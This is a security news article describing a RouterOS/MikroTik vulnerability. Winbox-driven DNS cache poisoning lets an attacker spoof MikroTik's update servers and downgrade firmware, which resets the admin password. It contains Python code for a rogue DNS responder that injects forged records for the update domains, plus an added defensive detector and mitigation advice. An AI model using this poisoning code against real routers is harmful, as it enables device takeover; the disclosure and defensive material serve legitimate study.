Backport vulnerability in RouterOS puts hundreds of thousands of devices at risk

The ability to remotely downgrade devices based on RouterOS (Mikrotik) puts hundreds of thousands of network devices at risk. The vulnerability is related to DNS cache poisoning through the Winbox protocol, and it allows outdated firmware (with the password reset to the default) or modified firmware to be loaded onto the device.

Vulnerability details

The RouterOS terminal supports the resolve command for DNS lookups.

This request is handled by a binary called resolver. Resolver is one of many binaries that communicate over the RouterOS Winbox protocol. At a high level, "messages" sent to the Winbox port can be routed to different binaries in RouterOS based on an array-based numbering scheme.

By default, RouterOS has the DNS server feature disabled.

However, even with the server function disabled, the router maintains its own DNS cache.

When we make a request using winbox_dns_request for example.com, the router caches the result.

Since we can specify the DNS server that the request should go to, feeding in incorrect addresses is trivial. For example, you can configure the DNS server implementation from Philip Klaus to always respond with an A record containing the IP address 192.168.88.250.

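from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the incoming query and build a reply with the same ID and question.
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Whatever name was asked for, answer with an A record for 192.168.88.250.
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()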

Now, if you look up example.com using Winbox, you can see that the router's DNS cache is poisoned.

Of course, poisoning example.com is not very useful, since the router will never actually use it. However, the router does need to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to another bug, it is possible to poison all of them at once.

from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the incoming query and build a reply with the same ID and question.
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # The answer to the name that was actually asked for.
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    # Four extra answers for names that were never asked for, with a long TTL.
    reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

The router asks for one record, and we give it five back. The router does not cache these responses correctly.
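A defender-side check for the flaw described above, written as an added example (not code from the original article or from MikroTik): it parses a raw DNS response with the standard library and lists answer records whose owner name was never asked for, which is the pattern a resolver should refuse to cache. The function names, the transaction ID and the sample message are constructed for illustration.

```python
import struct

def read_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end = [], None
    for _ in range(128):  # bounded walk, so a pointer loop cannot hang the parser
        n = msg[off]
        if n & 0xC0 == 0xC0:  # compression pointer
            end = off + 2 if end is None else end
            off = ((n & 0x3F) << 8) | msg[off + 1]
        elif n == 0:
            return ".".join(labels).lower(), (off + 1 if end is None else end)
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
            off += 1 + n
    raise ValueError("name too long or compression pointer loop")

def unsolicited_answers(msg):
    """Answer owner names that the question (or its CNAME chain) never asked for."""
    _id, _flags, qdcount, ancount = struct.unpack_from("!HHHH", msg, 0)
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = read_name(msg, 12)
    off += 4  # skip QTYPE and QCLASS
    expected, unsolicited = {qname}, []
    for _ in range(ancount):
        owner, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if owner not in expected:
            unsolicited.append(owner)
        elif rtype == 5:  # CNAME: its target is a legitimate next owner name
            expected.add(read_name(msg, off)[0])
        off += rdlen
    return unsolicited

def build_response(qname, answers):
    """Constructed sample: one question plus A records given as (name, ip)."""
    enc = lambda n: b"".join(bytes([len(p)]) + p.encode() for p in n.split(".")) + b"\x00"
    msg = struct.pack("!HHHHHH", 0x1234, 0x8480, 1, len(answers), 0, 0)
    msg += enc(qname) + struct.pack("!HH", 1, 1)
    for name, ip in answers:
        msg += enc(name) + struct.pack("!HHIH", 1, 1, 30, 4) + bytes(map(int, ip.split(".")))
    return msg

# Constructed reply with the shape described above: one question, extra owner names.
POISONED = build_response("example.com", [("example.com", "192.168.88.250"),
    ("upgrade.mikrotik.com", "192.168.88.250"), ("download.mikrotik.com", "192.168.88.250")])
print(unsolicited_answers(POISONED))
```

A non-empty result on a response to a single-name query is a reason to drop the message rather than cache it, and is also a usable signal when reviewing captured DNS traffic to a router.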

Obviously, this attack is also useful if the router acts as a DNS server, since it allows the router's clients to be attacked.

This attack also makes it possible to exploit a more serious vulnerability: downgrading or backporting the RouterOS version. The attacker recreates the logic of the update server, including the changelog, and forces RouterOS to treat an outdated (vulnerable) version as the current one. The danger here lies in the fact that when the version is "upgraded", the administrator password is reset to the default value: the attacker can log in to the system with an empty password!


The attack works quite well. The author also implements several more vectors, including ones related to embedding a backdoor in the firmware, but that is already an excessive technique, and using it for illegitimate purposes is against the law.

Protection

Simply disabling Winbox protects you against these attacks. Despite the convenience of administration through Winbox, it is better to use the SSH protocol.

Source: www.habr.com
